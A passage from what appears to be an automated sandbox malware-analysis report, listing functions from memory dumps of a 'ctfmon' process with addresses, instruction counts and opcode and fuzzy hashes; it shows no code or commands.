                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3770eaefb504f91ce03ab0f9881ff77666207b8ca9755a648a58999d325e15b4
                  • Instruction ID: 81dffb310885459e2cd2896f61fc075b8b5eda2e693cbe7842b7ee6ef566d0a5
                  • Opcode Fuzzy Hash: 3770eaefb504f91ce03ab0f9881ff77666207b8ca9755a648a58999d325e15b4
                  • Instruction Fuzzy Hash: BD51E13691E566AAE7417B6CB8411FA3B60EF517B8F181337D18C9D0D3EF2C208582AC
                  Function 00007FF848F56FCD Relevance: .2, Instructions: 207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07472e38ee51e2a746a0a5bf0f0e8932f0c2a456fe6a4dfa0cae130da1a39956
                  • Instruction ID: dae82ca4976d34af7dc2eb824fa16103dde4ce5adf3f4d16d3563ead3a20ef3d
                  • Opcode Fuzzy Hash: 07472e38ee51e2a746a0a5bf0f0e8932f0c2a456fe6a4dfa0cae130da1a39956
                  • Instruction Fuzzy Hash: 35717570D0DA4A8FEB55EF64C8596BDBBF1EF59380F10017AD409D72C2DB38A8448B89
                  Function 00007FF848F52A31 Relevance: .2, Instructions: 204COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a69945d4c635a15362a6ecb5e18124b7e5c2cc3d57015c416ad3d2361045746a
                  • Instruction ID: ae619a4431935dc56b19657b8196d182d8c4c807f5f6efc2fb3ee8c277cba876
                  • Opcode Fuzzy Hash: a69945d4c635a15362a6ecb5e18124b7e5c2cc3d57015c416ad3d2361045746a
                  • Instruction Fuzzy Hash: 6B81B570D1991D9FEBA4EBA8C8957ADB7B1FF58340F1042BAD00DE3292DF3469848B44
                  Function 00007FF848F41DBD Relevance: .2, Instructions: 194COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3f510f2b7624e06085b7dc159e1960c200d9427d34d22c6bd40f9f9cbd2dd21
                  • Instruction ID: 0ee7e9951e1b4e39463cc5a593305b7d8b96f7a7ae168067b80f358a787e46f9
                  • Opcode Fuzzy Hash: d3f510f2b7624e06085b7dc159e1960c200d9427d34d22c6bd40f9f9cbd2dd21
                  • Instruction Fuzzy Hash: 9151BE31A0CA5A8FDB48EF1888555BA77E2FFA8B50F10457FD45AD3282CF34A842C785
                  Function 00007FF848F4DB6D Relevance: .2, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8482e314e3235a50c2360c6e268679add2889f30fd0eb6464533a68769e5487
                  • Instruction ID: eef23178ccc9ab2e0604cc30cc6f44df111a1b7bc5d91d1f8a7460978bf16efd
                  • Opcode Fuzzy Hash: b8482e314e3235a50c2360c6e268679add2889f30fd0eb6464533a68769e5487
                  • Instruction Fuzzy Hash: 8861EB31D1995D9FEB98EB58D8A57B8B7B1FF68340F1441BAD00DE7296CB396880CB04
                  Function 00007FF848F523C0 Relevance: .2, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0fdd707e8206c2641e32ff79ab955f102adaefa36bb701201ef15101e544540d
                  • Instruction ID: 986eb0636275fd0955e0c2dc14e4e4f822b651aaf29774e1d04a10e84304d690
                  • Opcode Fuzzy Hash: 0fdd707e8206c2641e32ff79ab955f102adaefa36bb701201ef15101e544540d
                  • Instruction Fuzzy Hash: AA51693091D68A8FEB54EF64C8592FEBBE0FF19340F00467AE809D21C2DB78A554CB85
                  Function 00007FF848F56070 Relevance: .2, Instructions: 175COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fab3c53c6d9653050fc30d52131a77bc37b34b412d32a01edfdb99ad5c547687
                  • Instruction ID: 8b90d802bcfa705d880816f255d51f19de6e0272bf41eb309b237b31ace2861b
                  • Opcode Fuzzy Hash: fab3c53c6d9653050fc30d52131a77bc37b34b412d32a01edfdb99ad5c547687
                  • Instruction Fuzzy Hash: 02614D70D0D65A8FEBA5AB6488197B9BBB0FF15380F0041BAD41DD21D3DF3C69848B46
                  Function 00007FF848F50D30 Relevance: .2, Instructions: 173COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f33b46f6e2e2ee536593e83bcee26192f87f3a5fa620d1e3bb9838e82666934a
                  • Instruction ID: a40e246c260de2a8078b08e12de65338644e970f91d7905a09f03ba0469dfb92
                  • Opcode Fuzzy Hash: f33b46f6e2e2ee536593e83bcee26192f87f3a5fa620d1e3bb9838e82666934a
                  • Instruction Fuzzy Hash: C2516A3090D78E8FEB95EF2488592EABBF0FF56344F0405BAD809C7192EB38A9548745
                  Function 00007FF848F432A5 Relevance: .2, Instructions: 169COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b11acd0fc24f4d8ad269165f1831b81033643e9f0488cf3ba4970d7cc013188a
                  • Instruction ID: 86b1e21d9091a8fdc4901d8a0aa1def97fdd6fdf3bfcd69e0c59e4d71f392254
                  • Opcode Fuzzy Hash: b11acd0fc24f4d8ad269165f1831b81033643e9f0488cf3ba4970d7cc013188a
                  • Instruction Fuzzy Hash: 28511370D086198FEB54EBA8C494AEDBBB1EF68751F50013AD009E72D2DB38A944CB58
                  Function 00007FF848F54B39 Relevance: .2, Instructions: 166COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f42af7f2c3e4628cd82ba8212e17ef275eb42fd909314aac4e312390bdc78ee
                  • Instruction ID: 41bbc9a86af96e92b2da1730ccd14c1f55752a2f8360d9b364013d936802f9cf
                  • Opcode Fuzzy Hash: 5f42af7f2c3e4628cd82ba8212e17ef275eb42fd909314aac4e312390bdc78ee
                  • Instruction Fuzzy Hash: 27519F71C0E6DA9FE796AB2488692B9BBE0FF65345F0404FAD408C61D3EB286548C746
                  Function 00007FF848F53758 Relevance: .2, Instructions: 164COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 645cbd3a1ac42ef69bb7861bb1cdf1b801244275e9153a4598822f93f46d1ac6
                  • Instruction ID: 634dd0105fa26c3b25e89b4923e5adff47a72f7ea5d1e2d996ab309a713d5077
                  • Opcode Fuzzy Hash: 645cbd3a1ac42ef69bb7861bb1cdf1b801244275e9153a4598822f93f46d1ac6
                  • Instruction Fuzzy Hash: 8151EF70C0DA9A9FEB89EB2484692B9BBE0FF69340F0404FAD409C71D7DB38A444C755
                  Function 00007FF848F423A6 Relevance: .1, Instructions: 128COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction ID: 823312be5cb8c80a873f4d51dfb19524b8621f1c8eaaf01b8fbdce12c5e45d85
                  • Opcode Fuzzy Hash: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction Fuzzy Hash: 62515E30D0D5298EEBA4AB5488517FCB6B0FF65750F5042BBD44EB62D2DF782988CB48
                  Function 00007FF848F4C8D3 Relevance: .1, Instructions: 113COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8599b4a3f6738a3abfa2b255e0a3eac83ac233398475024a96043a59040523f2
                  • Instruction ID: 892decaf0ddc8dd98df0ab85f75c60ad4cf38ca53be0006cba215f94b782a67e
                  • Opcode Fuzzy Hash: 8599b4a3f6738a3abfa2b255e0a3eac83ac233398475024a96043a59040523f2
                  • Instruction Fuzzy Hash: EA31C13290D55AAEEB55BB68A4151FD3B60EF617B9F042377D508DA0C3EF3C244182AD
                  Function 00007FF848F4AEFA Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bfc520e87d3dd9491b990126ac00c80dde1e2113c7b08bbc7784bc78eb60a6d3
                  • Instruction ID: 04ed80659f95df05f3109c26f028c095475ad39fa7cb3241b8475b400f1e5175
                  • Opcode Fuzzy Hash: bfc520e87d3dd9491b990126ac00c80dde1e2113c7b08bbc7784bc78eb60a6d3
                  • Instruction Fuzzy Hash: BB31F2B1D0D98A9FE745EB7858581A97BE0FF25760F0805BBC008DB0D2EF2959868358
                  Function 00007FF848F4C1E8 Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: defcc1532a07a53cdb56b13c1f051743ca1fd6ad54196ccec640560f053e82b9
                  • Instruction ID: ef1e8cbd8dc785c6626c4df24d4a1a89212b61d6f609463f68ac90d46294993a
                  • Opcode Fuzzy Hash: defcc1532a07a53cdb56b13c1f051743ca1fd6ad54196ccec640560f053e82b9
                  • Instruction Fuzzy Hash: 6731D575E1C91D8EEB94EB989895ABCB7B5FF68740F50113AD00DE3282EF3468429B04
                  Function 00007FF848F4C260 Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 869a5736fcd19a58f0da54190e5a76ffe6ae567fe3e0ce25a06bafffec226e82
                  • Instruction ID: 95b703a03e4888b3e3a69e053aa2a9c976b8e9829b58b4ddfd933a58e2a9c9ac
                  • Opcode Fuzzy Hash: 869a5736fcd19a58f0da54190e5a76ffe6ae567fe3e0ce25a06bafffec226e82
                  • Instruction Fuzzy Hash: E421F930E1C91D8FEB94FB989895ABCB7B1FF69740F40112AD00DE3282DF3468429B44
                  Function 00007FF848F54C48 Relevance: .1, Instructions: 89COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5864dd310dea04db256eb08f33650d1ca229bcdcf15f37c186b3ab51fa820271
                  • Instruction ID: 7b6b48b8b8dad10872034a15cddb894c15214d84514707d1ef6162b8e5607a29
                  • Opcode Fuzzy Hash: 5864dd310dea04db256eb08f33650d1ca229bcdcf15f37c186b3ab51fa820271
                  • Instruction Fuzzy Hash: 9731A071C0E69A8FEB99EF2498292B9BAA0FF65345F0401FAD808C21D7DB286554C746
                  Function 00007FF848F4B1ED Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f0f22ce739c4788c8d3f17d4293cbd10399a115335aa58276354fbe21102ea4b
                  • Instruction ID: 7403233b407f4df96ac5f6cf088c2a84aaf7e68e0cd55247705f522d3c970fa7
                  • Opcode Fuzzy Hash: f0f22ce739c4788c8d3f17d4293cbd10399a115335aa58276354fbe21102ea4b
                  • Instruction Fuzzy Hash: F4310670D1852A9EEB94EFA4C8447ECB6F1FF68740F1041BAD00DF2292DB7969848F58
                  Function 00007FF848F4A7B5 Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 282f5a196a1cbf26168452e8ccd2ee656392ed45e04b2c27ec64c8bb790caa6e
                  • Instruction ID: f586ea15bd7f6606e5508835e081b8fb64d9976e6c7a01593b4a31e07556dfef
                  • Opcode Fuzzy Hash: 282f5a196a1cbf26168452e8ccd2ee656392ed45e04b2c27ec64c8bb790caa6e
                  • Instruction Fuzzy Hash: 58218630D1DA499EEB49EBA4D8656FDBBB1FF68700F10017AD00AE32D2DB282480CB14
                  Function 00007FF848F50E50 Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf81a3c413382c992c87810f77635b51aea5499c715083ef960f11488db50c11
                  • Instruction ID: 0bfda69268d9a81c78d98a3db5329ea0bbeb90b6266f62edca0a5c7544f0ead7
                  • Opcode Fuzzy Hash: bf81a3c413382c992c87810f77635b51aea5499c715083ef960f11488db50c11
                  • Instruction Fuzzy Hash: F521683190D78E8FEB95BF2488182BABBE1FF56344F0405BAD809D71D2EB78A9448745
                  Function 00007FF848F42248 Relevance: .1, Instructions: 79COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad6558d2c35af793b2d66a7654682f7034fb4f14e0b7ab324d06c80056ddd0a8
                  • Instruction ID: be20e10f4ad924234a72af27a9f196726b4b8e2b3b26191e8763b8a7d7cebbdb
                  • Opcode Fuzzy Hash: ad6558d2c35af793b2d66a7654682f7034fb4f14e0b7ab324d06c80056ddd0a8
                  • Instruction Fuzzy Hash: 0521CF3190D54A8FF741BB7884492A87BE0EF56780F0404B6D419E70D2EE38A9858365
                  Function 00007FF848F42458 Relevance: .1, Instructions: 78COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction ID: 44c8513a8fd59466d15f6d545f1e7d993ee75eaaa0ba69f339223c56fae7ee29
                  • Opcode Fuzzy Hash: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction Fuzzy Hash: E231E430D0C5298EEBA4EB54C8547FDB2B4EF64740F4041BAD40EA62D2DF786A88CF18
                  Function 00007FF848F4A87D Relevance: .1, Instructions: 78COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dce228ae74f1f165a1e4666c7a2ac0899b5223934f07ff3e57c7e4261ab0d0d
                  • Instruction ID: 7a8a351e4962e908a0cdbf84cc8dcc4ed0e55cb5e7c09fde1aec35c1a2f8a3cd
                  • Opcode Fuzzy Hash: 4dce228ae74f1f165a1e4666c7a2ac0899b5223934f07ff3e57c7e4261ab0d0d
                  • Instruction Fuzzy Hash: D521473091854E9FEB89EB68E8586FDBBB0FF29301F1005BBE419E31D2DB3565508B44
                  Function 00007FF848F4A5A1 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eaebadb25cf96c475151394f51688263f418ebb26cdf7b93d9d17d4313bcdd28
                  • Instruction ID: 67909845e20b8b1d6dd463a2e56eb3829caccd6c61507f639a2281f1b2bff386
                  • Opcode Fuzzy Hash: eaebadb25cf96c475151394f51688263f418ebb26cdf7b93d9d17d4313bcdd28
                  • Instruction Fuzzy Hash: 03215C7091864D8FDB89EF28C489AED7BF0FF2C305F01056AE80AD7291DB34A491CB80
                  Function 00007FF848F40A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68c5b5efcf458ef3934912b0f4fc3304529344a4c599322aa6f129b65931035f
                  • Instruction ID: e968480d3c031e5321a5ba84845affd0f2730342d7bb7deb1c033910b7d73080
                  • Opcode Fuzzy Hash: 68c5b5efcf458ef3934912b0f4fc3304529344a4c599322aa6f129b65931035f
                  • Instruction Fuzzy Hash: 48115B3191954E9EE780FB68C8491B97BE0FFA8790F4005B6D818E6192EF78A5448744
                  Function 00007FF848F434AC Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b7c725f16879090d97e48ea8fcc990fa680fe7e8dab4868d38e97d921adbe9c4
                  • Instruction ID: d1d52addbc6d0b81a0caa8d8294bbb777e05da87fe8561ae56015f01b67802d5
                  • Opcode Fuzzy Hash: b7c725f16879090d97e48ea8fcc990fa680fe7e8dab4868d38e97d921adbe9c4
                  • Instruction Fuzzy Hash: 4221B13084D68A4FD742EB7888589A97FF4EF1B310F0904EBD049C70A2DB389445CB21
                  Function 00007FF848F4C9D0 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7a95139028b14847d81c20212ebd8ea4941d5d3294137793c7e6f90e6b1f3332
                  • Instruction ID: e47db0bd2daedad089cd3cc733f1cebc0888adf788571adb53e15eedb7762701
                  • Opcode Fuzzy Hash: 7a95139028b14847d81c20212ebd8ea4941d5d3294137793c7e6f90e6b1f3332
                  • Instruction Fuzzy Hash: E7116D3080D68D9FEB46EB6488691B97BA0FF29741F0406BBD419E71E2EF745850C754
                  Function 00007FF848F4BCE5 Relevance: .1, Instructions: 58COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 616c6222338abceb3f2ce14bd349a596be6104afefc5061c7d89b68ce382ea3b
                  • Instruction ID: e2e618498b2dc09c81100b093522eeedc9e8aea9207c8c50654bdbdeff1c251c
                  • Opcode Fuzzy Hash: 616c6222338abceb3f2ce14bd349a596be6104afefc5061c7d89b68ce382ea3b
                  • Instruction Fuzzy Hash: 8A113C3091864D8FDB89EF6488992B97BA0FF28741F4005BAD419D6192DB35A550C704
                  Function 00007FF848F435C5 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 428cfd659ae2237c7a0a7f7c35c569fad64565c62166b28867ea38422146697a
                  • Instruction ID: 5a753bbf5a49651c7cee220e43bbfbfc3621fa64bd31ff662d020f1add23540b
                  • Opcode Fuzzy Hash: 428cfd659ae2237c7a0a7f7c35c569fad64565c62166b28867ea38422146697a
                  • Instruction Fuzzy Hash: 6B11703091C54E9FEB84FF6884599B9BBA0FF28741F00047AD419D22D1EF38A5408704
                  Function 00007FF848F4C4F9 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d16c6032e3c8a38fa9cf71d469373dfaec0c82c5db7f93a47264eb2cf7eab14e
                  • Instruction ID: f4218a2ab77550a6532be4f1300d095b0a923f2a136d0c420e6359708e5b8fcc
                  • Opcode Fuzzy Hash: d16c6032e3c8a38fa9cf71d469373dfaec0c82c5db7f93a47264eb2cf7eab14e
                  • Instruction Fuzzy Hash: EB11AC7080D68D8FEB49EF2484592BD7BA1FF69301F1541BFD409D61E2EB35A440C744
                  Function 00007FF848F42F31 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0f197b27612379690dbd70128762a5c2e8c1ff69dc7bca0c14cc1a503df9840f
                  • Instruction ID: 5235df7319445928a60a4e778febcae69bfe5050a3e09cb390d08efab2fbf566
                  • Opcode Fuzzy Hash: 0f197b27612379690dbd70128762a5c2e8c1ff69dc7bca0c14cc1a503df9840f
                  • Instruction Fuzzy Hash: A601DF3091C64E8FE741FB6488482B97BE0FF69751F8505B7D808C30E6EB34E0448700
                  Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0ac690df38949cdcbc0b487b9a699e71d097b1f27682a73a8cf18d14acd2d8f1
                  • Instruction ID: 727ebacfb4e1e467adbc68aa790fbb6da57e3ade4877ff96c53fa655181f49ea
                  • Opcode Fuzzy Hash: 0ac690df38949cdcbc0b487b9a699e71d097b1f27682a73a8cf18d14acd2d8f1
                  • Instruction Fuzzy Hash: 5E018870908A0E8FEB88EF24C4596BAB7A1FF68345F20447ED40EE21D1CB36A590CB44
                  Function 00007FF848F4C0CA Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a94d6e097281fb32f4116c9c22d6b3addbf642bc8955cad3ff00f2d8a756a68
                  • Instruction ID: 2189f228fdfff467081f8c16246401d8740372f79e67e5aca173da7114f3b160
                  • Opcode Fuzzy Hash: 1a94d6e097281fb32f4116c9c22d6b3addbf642bc8955cad3ff00f2d8a756a68
                  • Instruction Fuzzy Hash: 32014C3090894E8EEB88FF6884592BE7AE0FF28741F10057AD41AE21D1EF75A590C744
                  Function 00007FF848F514CB Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
